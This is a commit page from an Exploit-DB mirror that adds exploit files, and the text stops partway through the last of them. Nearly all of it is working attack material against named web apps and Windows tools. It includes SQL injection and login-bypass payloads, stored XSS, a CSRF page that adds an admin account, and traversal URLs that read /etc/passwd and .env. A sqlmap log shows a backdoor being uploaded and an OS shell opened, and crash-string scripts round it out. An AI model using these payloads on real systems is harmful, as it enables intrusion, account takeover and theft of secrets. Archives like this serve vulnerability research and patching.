bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2020-01-07

Browse source 
33 changes to exploits/shellcodes

NetShareWatcher 1.5.8.0 - 'Name' Denial Of Service
NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC)
SpotIE 2.9.5 - 'Key' Denial of Service (PoC)
Dnss Domain Name Search Software - 'Key' Denial of Service (PoC)
BlueAuditor 1.7.2.0 - 'Name' Denial of Service (PoC)
ShareAlarmPro Advanced Network Access Control - 'Key' Denial of Service (PoC)
NetShareWatcher 1.5.8.0 - 'Key' Denial of Service (PoC)
Dnss Domain Name Search Software - 'Name' Denial of Service (PoC)
TextCrawler Pro3.1.1 - Denial of Service (PoC)
RemShutdown 2.9.0.0 - 'Key' Denial of Service (PoC)
Backup Key Recovery Recover Keys Crashed Hard Disk Drive 2.2.5 - 'Key' Denial of Service (PoC)
RemShutdown 2.9.0.0 - 'Name' Denial of Service (PoC)
NBMonitor 1.6.6.0 - 'Key' Denial of Service (PoC)
Office Product Key Finder 1.5.4 - Denial of Service (PoC)
SpotFTP FTP Password Recovery 3.0.0.0 - 'Name' Denial of Service (PoC)
SpotMSN 2.4.6 - 'Name' Denial of Service (PoC)
SpotIM 2.2 - 'Name' Denial Of Service
FTPGetter Professional 5.97.0.223 -  Denial of Service (PoC)
Duplicate Cleaner Pro 4 - Denial of Service (PoC)
Microsoft Outlook VCF cards - Denial of Service (PoC)
Adaware Web Companion 4.9.2159 - 'WCAssistantService' Unquoted Service Path
Windows - Shell COM Server Registrar Local Privilege Escalation
Dairy Farm Shop Management System 1.0 - 'username' SQL Injection
Complaint Management System 4.0 - 'cid' SQL injection
IBM RICOH Infoprint 1532 Printer - Persistent Cross-Site Scripting
Subrion CMS 4.0.5 - Cross-Site Request Forgery (Add Admin)
Hostel Management System 2.0 - 'id' SQL Injection
elaniin CMS 1.0 - Authentication Bypass
Small CRM 2.0 - Authentication Bypass
Voyager 1.3.0 - Directory Traversal
Codoforum 4.8.3 - Persistent Cross-Site Scripting
Django < 3.0 < 2.2 < 1.11 - Account Hijack

Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes)
This commit is contained in:
Offensive Security 2020-01-07 05:02:07 +00:00
parent 975e7769c7
commit 95c6eeab79
35 changed files with 1893 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

35
exploits/hardware/webapps/47850.txt Normal file
View file

@ -0,0 +1,35 @@
# Exploit Title: IBM RICOH Infoprint 1532 Printer - Persistent Cross-Site Scripting
# Date: 2020-01-02
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.ibm.com/il-en
# Hardware Link: https://www-01.ibm.com/common/ssi/cgi-bin/ssialias?infotype=AN&subtype=CA&htmlfid=897/ENUS105-476&appname=USN
# Vulernability Type: Cross-site Scripting
# Vulenrability: Stored XSS
# CVE: N/A
# Description :
# Ricoh (IBM) InfoPrint 1532 devices allow Stored XSS via the 1.network.6.10 parameter to the
# cgi-bin/posttest/cgi-bin/dynamic/config/gen/general.html URI. (HTML Injection can also occur.)
HTTP Request :
POST /cgi-bin/posttest/cgi-bin/dynamic/config/gen/general.html HTTP/1.1
Host: 134.84.35.70
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 281
Origin: https://134.84.35.70
Connection: close
Referer: https://134.84.35.70/cgi-bin/dynamic/config/gen/general.html
Upgrade-Insecure-Requests: 1
0.printer.1.14=0&0.mfp.1.2=0&0.mfp.1.3=0&0.mfp.1.1=30&0.mfp.100.11=30&0.printer.4.258=1&1.network.6.10=%22%3E%3Cscript%3Ealert%28%22ismailtasdelen%22%29%3C%2Fscript%3E&1.network.6.11=&0.network.6.4=90&1.network.6.69=000000000000&2.network.6.63=0&0.network.10.73=120&1.printer.1.40=
HTTP Response :
HTTP/1.0 200 OK
Content-Type: text/html
Content-Length: 269

164
exploits/php/webapps/47846.txt Normal file
View file

@ -0,0 +1,164 @@
# Exploit Title: Dairy Farm Shop Management System 1.0 - 'username' SQL Injection
# Google Dork: N/A
# Date: 2020-01-03
# Exploit Author: Chris Inzinga
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/
# Version: v1.0
# Tested on: Windows
# CVE: N/A
# The Dairy Farm Shop Management System 1.0 web application is vulnerable to
# SQL injection in multiple areas. The most severe of these is the username
# parameter on the login page as this injection can be done unauthenticated.
================================ 'username' - SQLi ================================
POST /dfsms/index.php HTTP/1.1
Host: 192.168.0.33
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.33/dfsms/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
Connection: close
Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg
Upgrade-Insecure-Requests: 1
username=test&password=test&login=
---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=test' AND (SELECT 5667 FROM (SELECT(SLEEP(5)))mKGL) AND 'UlkV'='UlkV&password=test&login=
---
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
================================ 'category' & 'categorycode' - SQLi ================================
POST /dfsms/add-category.php HTTP/1.1
Host: 192.168.0.33
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.33/dfsms/add-category.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
Connection: close
Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg
Upgrade-Insecure-Requests: 1
category=test&categorycode=test&submit=
---
Parameter: category (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: category=test' AND (SELECT 8892 FROM (SELECT(SLEEP(5)))WzFH) AND 'NELe'='NELe&categorycode=test&submit=
---
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
---
Parameter: categorycode (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: category=test&categorycode=test' AND (SELECT 9140 FROM (SELECT(SLEEP(5)))bzQA) AND 'izaK'='izaK&submit=
---
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
================================ 'companyname' - SQLi ================================
---
Parameter: companyname (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: companyname=test' AND (SELECT 7565 FROM (SELECT(SLEEP(5)))znna) AND 'bEUm'='bEUm&submit=
---
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
================================ 'productname' & 'productprice' - SQLi ================================
---
Parameter: productname (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: category=Milk&company=Amul&productname=test' AND (SELECT 1171 FROM (SELECT(SLEEP(5)))rlQI) AND 'RgaN'='RgaN&productprice=test&submit=
---
---
Parameter: productprice (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: category=Milk&company=Amul&productname=test&productprice=test' AND (SELECT 8940 FROM (SELECT(SLEEP(5)))BRuk) AND 'Imqh'='Imqh&submit=
---
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
================================ 'fromdate' & 'todate' - SQLi ================================
---
Parameter: todate (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: fromdate=2020-01-05&todate=-6737' OR 3099=3099#&submit=
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: fromdate=2020-01-05&todate=2020-01-31' OR (SELECT 3665 FROM(SELECT COUNT(*),CONCAT(0x7162766271,(SELECT (ELT(3665=3665,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- mqby&submit=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: fromdate=2020-01-05&todate=2020-01-31' AND (SELECT 5717 FROM (SELECT(SLEEP(5)))adaE)-- cLAK&submit=
Type: UNION query
Title: MySQL UNION query (NULL) - 5 columns
Payload: fromdate=2020-01-05&todate=2020-01-31' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162766271,0x666369456150614b454a4f51454e6e687449724a786445585455515a67614162754545716d476f6f,0x716a7a7171),NULL#&submit=
Parameter: fromdate (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: fromdate=2020-01-05' AND (SELECT 7128 FROM(SELECT COUNT(*),CONCAT(0x7162766271,(SELECT (ELT(7128=7128,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Tzxh&todate=2020-01-31&submit=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: fromdate=2020-01-05' AND (SELECT 7446 FROM (SELECT(SLEEP(5)))Aklw)-- uzkF&todate=2020-01-31&submit=
---
================================ 'mobilenumber' & 'emailid' & 'adminname' - SQLi ================================
---
Parameter: emailid (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: adminname=Admin&username=admin&emailid=admin@test.com' AND (SELECT 5884 FROM (SELECT(SLEEP(5)))EgFJ) AND 'kFGt'='kFGt&mobilenumber=1234567899&update=
---
---
Parameter: adminname (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: adminname=Admin' AND (SELECT 5969 FROM (SELECT(SLEEP(5)))vpfG) AND 'kOJS'='kOJS&username=admin&emailid=admin@test.com&mobilenumber=1234567899&update=
---
---
Parameter: mobilenumber (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: adminname=Admin&username=admin&emailid=admin@test.com&mobilenumber=1234567899' AND (SELECT 1163 FROM (SELECT(SLEEP(5)))rdwj) AND 'mnwu'='mnwu&update=
---

45
exploits/php/webapps/47847.txt Normal file
View file

@ -0,0 +1,45 @@
# Exploit Title: Complaint Management System 4.0 - 'cid' SQL injection
# Google Dork: N/A
# Date: 2020-01-03
# Exploit Author: FULLSHADE
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/complaint-management-sytem/
# Version: v4.0
# Tested on: Windows 7
# CVE : N/A
Description:
The Complaint Management System v4.0 application from PHPgurukul is vulnerable to
blind SQL injection via the 'cid' parameter which is found on the complaint-details.php
page.
========== 1. SQLi ==========
SQLMAP POC:
GET parameter 'cid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 1748 HTTP(s) requests:
---
Parameter: cid (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: cid=2'+(SELECT 0x7648556f WHERE 4476=4476 AND SLEEP(5))+'
---
The ?cid parameter is vulnerable to sql injection within the
the vulnerable URL = https://10.0.0.214/complaint%20management%20system/cms/admin/complaint-details.php?cid=2
request:
GET /complaint%20management%20system/cms/admin/complaint-details.php?cid=2 HTTP/1.1
Host: 10.0.0.214
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=5bmri9rlp1jvrjkhgumn7v9fot
Upgrade-Insecure-Requests: 1

138
exploits/php/webapps/47851.txt Normal file
View file

@ -0,0 +1,138 @@
# Exploit Title: Subrion CMS 4.0.5 - Cross-Site Request Forgery (Add Admin)
# Date: 2020-01-05
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://intelliants.com/
# Software Link : https://github.com/intelliants/subrion/releases/tag/v4.0.5
# Software : Subrion CMS
# Product Version: v 4.0.5.10
# Vulernability Type : Cross-Site Request Forgery (Add Admin)
# Vulenrability : Cross-Site Request Forgery
# CVE : N/A
# Description :
# CSRF vulnerability was discovered in v4.0.5 version of Subrion CMS.
# With this vulnerability, authorized users can be added to the system.
HTML CSRF PoC :
<html>
<body>
<script>history.pushState('', '', '/')</script>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "https:\/\/SERVER\/_core\/admin\/members\/add\/", true);
xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------9973334999367242361642875270");
xhr.withCredentials = true;
var body = "-----------------------------9973334999367242361642875270\r\n" +
"Content-Disposition: form-data; name=\"__st\"\r\n" +
"\r\n" +
"41209a5f43b0d7c8cef0e7ffcd9ce160\r\n" +
"-----------------------------9973334999367242361642875270\r\n" +
"Content-Disposition: form-data; name=\"username\"\r\n" +
"\r\n" +
"ismailtasdelen\r\n" +
"-----------------------------9973334999367242361642875270\r\n" +
"Content-Disposition: form-data; name=\"fullname\"\r\n" +
"\r\n" +
"Ismail Tasdelen\r\n" +
"-----------------------------9973334999367242361642875270\r\n" +
"Content-Disposition: form-data; name=\"email\"\r\n" +
"\r\n" +
"test@mail.com\r\n" +
"-----------------------------9973334999367242361642875270\r\n" +
"Content-Disposition: form-data; name=\"_password\"\r\n" +
"\r\n" +
"Test1234!\r\n" +
"-----------------------------9973334999367242361642875270\r\n" +
"Content-Disposition: form-data; name=\"_password2\"\r\n" +
"\r\n" +
"Test1234!\r\n" +
"-----------------------------9973334999367242361642875270\r\n" +
"Content-Disposition: form-data; name=\"usergroup_id\"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------9973334999367242361642875270\r\n" +
"Content-Disposition: form-data; name=\"v[avatar[]]\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------9973334999367242361642875270\r\n" +
"Content-Disposition: form-data; name=\"avatar[]\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------9973334999367242361642875270\r\n" +
"Content-Disposition: form-data; name=\"website\"\r\n" +
"\r\n" +
"https://ismailtasdelen.com\r\n" +
"-----------------------------9973334999367242361642875270\r\n" +
"Content-Disposition: form-data; name=\"phone\"\r\n" +
"\r\n" +
"0000000000000000000\r\n" +
"-----------------------------9973334999367242361642875270\r\n" +
"Content-Disposition: form-data; name=\"biography\"\r\n" +
"\r\n" +
"NULL\r\n" +
"-----------------------------9973334999367242361642875270\r\n" +
"Content-Disposition: form-data; name=\"facebook\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------9973334999367242361642875270\r\n" +
"Content-Disposition: form-data; name=\"twitter\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------9973334999367242361642875270\r\n" +
"Content-Disposition: form-data; name=\"gplus\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------9973334999367242361642875270\r\n" +
"Content-Disposition: form-data; name=\"linkedin\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------9973334999367242361642875270\r\n" +
"Content-Disposition: form-data; name=\"sponsored\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------9973334999367242361642875270\r\n" +
"Content-Disposition: form-data; name=\"plan_id\"\r\n" +
"\r\n" +
"2\r\n" +
"-----------------------------9973334999367242361642875270\r\n" +
"Content-Disposition: form-data; name=\"sponsored_end\"\r\n" +
"\r\n" +
"2020-02-05 05:18:43\r\n" +
"-----------------------------9973334999367242361642875270\r\n" +
"Content-Disposition: form-data; name=\"featured\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------9973334999367242361642875270\r\n" +
"Content-Disposition: form-data; name=\"featured_end\"\r\n" +
"\r\n" +
"2020-02-05 05:19\r\n" +
"-----------------------------9973334999367242361642875270\r\n" +
"Content-Disposition: form-data; name=\"status\"\r\n" +
"\r\n" +
"active\r\n" +
"-----------------------------9973334999367242361642875270\r\n" +
"Content-Disposition: form-data; name=\"save\"\r\n" +
"\r\n" +
"Add\r\n" +
"-----------------------------9973334999367242361642875270\r\n" +
"Content-Disposition: form-data; name=\"goto\"\r\n" +
"\r\n" +
"list\r\n" +
"-----------------------------9973334999367242361642875270--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>

49
exploits/php/webapps/47854.txt Normal file
View file

@ -0,0 +1,49 @@
# Exploit Title: Hostel Management System 2.0 - 'id' SQL Injection
# Google Dork: intitle: "Hostel management system"
# Date: 2020-01-03
# Exploit Author: FULLSHADE
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/hostel-management-system/
# Version: v2.0
# Tested on: Windows
# CVE : N/A
Description:
The Hostel Management System v2.0 application from PHPgurukul is vulnerable to
SQL injection via the 'id' parameter on the full-profile.php page.
==================== 1. SQLi ====================
http://10.0.0.214/Hostel%20management%20System%20Project/hostel/full-profile.php?id=1
THe ?id parameter is vulnerable to SQL injection, it was also tested, and a un-authenticated
user has the full ability to run system commands via --os-shell and fully compromise the system
GET parameter 'id' is vulnerable.
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: id=-3444' OR 1650=1650#
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' OR (SELECT 3801 FROM(SELECT COUNT(*),CONCAT(0x7176627a71,(SELECT (ELT(3801=3801,1))),0x71707a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- klCZ
Type: time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: id=1' OR SLEEP(5)-- slKU
Type: UNION query
Title: MySQL UNION query (NULL) - 29 columns
Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176627a71,0x63786c795a416371494752765744487a4e6443636e705076586e714d735a7053595a4b676b526157,0x71707a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
[14:20:08] [INFO] the file stager has been successfully uploaded on 'C:/xampp/htdocs/' - http://10.0.0.214:80/tmpulczr.php
[14:20:08] [INFO] the backdoor has been successfully uploaded on 'C:/xampp/htdocs/' - http://10.0.0.214:80/tmpbjdvm.php
[14:20:08] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] y
command standard output: 'john-pc\john'
os-shell>

30
exploits/php/webapps/47858.txt Normal file
View file

@ -0,0 +1,30 @@
# Exploit Title: elaniin CMS 1.0 - Authentication Bypass
# Author: riamloo
# Date: 2020-01-02
# Vendor Homepage: https://elaniin.com/ ( github ==> https://github.com/elaniin/ )
# Software Link: https://github.com/elaniin/CMS/archive/master.zip
# Version: 1
# CVE: N/A
# Tested on: Win 10
# Discription:
# Open-source Content Management System created with PHP + MySQL https://elaniin.com/
# Vulnerability: Attacker can bypass login page and access to dashboard page
# vulnerable file : login.php
# Parameter & Payload: '=''or'
# Proof of Concept:
http://localhost/elaniin/login.php
POST /elaniin/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;
Content-Length: 334
Referer: http://localhost/elaniin/login.php
Cookie: PHPSESSID=81spdqht0gvh0f97vg62nzxs8
Connection: close
Upgrade-Insecure-Requests: 1
email=%27%3D%27%27or%27&password=%27%3D%27%27or%27&submit=LOGIN

35
exploits/php/webapps/47874.txt Normal file
View file

@ -0,0 +1,35 @@
# Exploit Title: Small CRM 2.0 - Authentication Bypass
# Google Dork: N/A
# Date: 2020-01-02
# Exploit Author: FULLSHADE
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/small-crm-php/
# Version: V2.0
# Tested on: Windows
# CVE : N/A
# Description:
#
# There is a SQL injection vulnerability in the /index.php page
# which allows for an attacker to use the SQLi login bypass payload
# '=''or' for both the username and password parameters, this allows
# for any authenticated or low level user to login to the admin account.
========== 1. Authentication bypass ==========
POST /Small%20CRM%20Projects%20Using%20PHP%20and%20MySQL/crm/admin/index.php HTTP/1.1
Host: 10.0.0.214
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 57
Origin: http://10.0.0.214
DNT: 1
Connection: close
Referer: http://10.0.0.214/Small%20CRM%20Projects%20Using%20PHP%20and%20MySQL/crm/admin/index.php
Cookie: PHPSESSID=k5845lo7s90it5p33js75665jq
Upgrade-Insecure-Requests: 1
email=%27%3D%27%27or%27&password=%27%3D%27%27or%27&login=

50
exploits/php/webapps/47875.txt Normal file
View file

@ -0,0 +1,50 @@
# Exploit Title: Voyager 1.3.0 - Directory Traversal
# Google Dork: N/A
# Date: January 2020-01-06
# Exploit Author: NgoAnhDuc
# Vendor Homepage: https://voyager.devdojo.com/
# Software Link:https://github.com/the-control-group/voyager/releases/tag/v1.3.0https://github.com/the-control-group/voyager/releases/tag/v1.2.7
# Version: 1.3.0 and bellow
# Tested on: Ubuntu 18.04
# CVE : N/A
Vulnerable code is in voyager/src/Http/Controllers/VoyagerController.php
========================================
public function assets(Request $request)
{
*$path = str_start(str_replace(['../', './'], '',
urldecode($request->path)), '/');*
* $path = base_path('vendor/tcg/voyager/publishable/assets'.$path);*
if (File::exists($path)) {
$mime = '';
if (ends_with($path, '.js')) {
$mime = 'text/javascript';
} elseif (ends_with($path, '.css')) {
$mime = 'text/css';
} else {
$mime = File::mimeType($path);
}
$response = response(File::get($path), 200,
['Content-Type' => $mime]);
$response->setSharedMaxAge(31536000);
$response->setMaxAge(31536000);
$response->setExpires(new \DateTime('+1 year'));
return $response;
}
return response('', 404);
}
========================================
PoC:
passwd:
http://localhost/admin/voyager-assets?path=.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2Fetc/passwd
Laravel environment
file:http://localhost/admin/voyager-assets?path=.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F<web
root dir>/.env

22
exploits/php/webapps/47876.txt Normal file
View file

@ -0,0 +1,22 @@
# Exploit Title: Codoforum 4.8.3 - Persistent Cross-Site Scripting
# Google Dork: intext:"Powered by Codoforum"
# Date: 2020-01-03
# Exploit Author: Prasanth c41m, Vyshnav Vizz
# Vendor Homepage: https://codoforum.com/index.php
# Software Link: https://codoforum.com/buy
# Version: Codoforum 4.8.3
# Tested on: [relevant os]
# CVE : [if applicable]
# source: https://medium.com/@c41m/b2e1133c6a91?
Codoforum is prone to a stored xss vulnerability.
An attacker can exploit this issue to creating user with payload and perform cross-site scripting attacks.
Codoforum version 4.8.3 is vulnerable.
1. Install Codoforum 4.8.3 in a local server.
2. Goto http://localhost/index.php?u=/user/register
3. Create a user using :-
username : "><svg/onload=alert(1)>
password : password
email : c41m@email.com
4. Now goto http://localhost/admin/index.php?page=users/manage, an XSS alert popup will be triggered here.

31
exploits/python/webapps/47879.md Normal file
View file

@ -0,0 +1,31 @@
EDB Note ~ Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47879.zip
# django_cve_2019_19844_poc
PoC for [CVE-2019-19844](https://www.djangoproject.com/weblog/2019/dec/18/security-releases/)
# Requirements
- Python 3.7.x
- PostgreSQL 9.5 or higher
## Setup
1. Create database(e.g. `django_cve_2019_19844_poc`)
1. Set the database name to the environment variable `DJANGO_DATABASE_NAME`(e.g. `export DJANGO_DATABASE_NAME=django_cve_2019_19844_poc`)
1. Run `pip install -r requirements.txt && ./manage.py migrate --noinput`
1. Create the following user with `shell` command:
```python
>>> from django.contrib.auth import get_user_model
>>> User = get_user_model()
>>> User.objects.create_user('mike123', 'mike@example.org', 'test123')
```
## Procedure For Reproducing
1. Run `./manage.py runserver`
1. Open `http://127.0.0.1:8000/accounts/password-reset/`
1. Input `mıke@example.org` (Attacker's email), and click send button
1. Receive email (Check console), and reset password
1. Login as `mike123` user

33
exploits/windows/dos/47848.py Executable file
View file

@ -0,0 +1,33 @@
# Exploit Title: NetShareWatcher 1.5.8.0 - 'Name' Denial Of Service
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://netsharewatcher.nsauditor.com/downloads/NetShareWatcher_setup.exe
# Tested on OS: Windows 10
# CVE : N/A
'''
Proof of Concept (PoC):
=======================
1.Download and install NetShareWatcher
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Register -> Enter Registration Code
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Name' and click on 'Ok'
6.NetShareWatcher Crashed
'''
#!/usr/bin/python
buffer = "A" * 1000
payload = buffer
try:
f=open("poc.txt","w")
print("[+] Creating %s bytes evil payload." %len(payload))
f.write(payload)
f.close()
print("[+] File created!")
except:
print("File cannot be created.")

33
exploits/windows/dos/47853.py Executable file
View file

@ -0,0 +1,33 @@
# Exploit Title: NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC)
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/networksleuth_setup.exe
# Tested on OS: Windows 10
# CVE : N/A
'''
Proof of Concept (PoC):
=======================
1.Download and install BlueAuditor
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Register -> Enter Registration Code
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Key' and click on 'Ok'
6.BlueAuditor Crashed
'''
#!/usr/bin/python
buffer = "A" * 1000
payload = buffer
try:
f=open("poc.txt","w")
print("[+] Creating %s bytes evil payload." %len(payload))
f.write(payload)
f.close()
print("[+] File created!")
except:
print("File cannot be created.")

33
exploits/windows/dos/47855.py Executable file
View file

@ -0,0 +1,33 @@
# Exploit Title: SpotIE 2.9.5 - 'Key' Denial of Service (PoC)
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/spotie_setup.exe
# Tested on OS: Windows 10
# CVE : N/A
'''
Proof of Concept (PoC):
=======================
1.Download and install BlueAuditor
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Register -> Enter Registration Code
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Key' and click on 'Ok'
6.BlueAuditor Crashed
'''
#!/usr/bin/python
buffer = "A" * 1000
payload = buffer
try:
f=open("poc.txt","w")
print("[+] Creating %s bytes evil payload." %len(payload))
f.write(payload)
f.close()
print("[+] File created!")
except:
print("File cannot be created.")

33
exploits/windows/dos/47856.py Executable file
View file

@ -0,0 +1,33 @@
# Exploit Title: Dnss Domain Name Search Software - 'Key' Denial of Service (PoC)
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/networksleuth_setup.exe
# Tested on OS: Windows 10
# CVE : N/A
'''
Proof of Concept (PoC):
=======================
1.Download and install Dnss
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Register -> Enter Registration Code
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Key' and click on 'Ok'
6.Dnss Crashed
'''
#!/usr/bin/python
buffer = "A" * 1000
payload = buffer
try:
f=open("poc.txt","w")
print("[+] Creating %s bytes evil payload." %len(payload))
f.write(payload)
f.close()
print("[+] File created!")
except:
print("File cannot be created.")

33
exploits/windows/dos/47857.py Executable file
View file

@ -0,0 +1,33 @@
# Exploit Title: BlueAuditor 1.7.2.0 - 'Name' Denial of Service (PoC)
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/blueauditor_setup.exe
# Tested on OS: Windows 10
# CVE : N/A
'''
Proof of Concept (PoC):
=======================
1.Download and install BlueAuditor
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Register -> Enter Registration Code
4.Copy and paste the characters in the file (poc.txt)
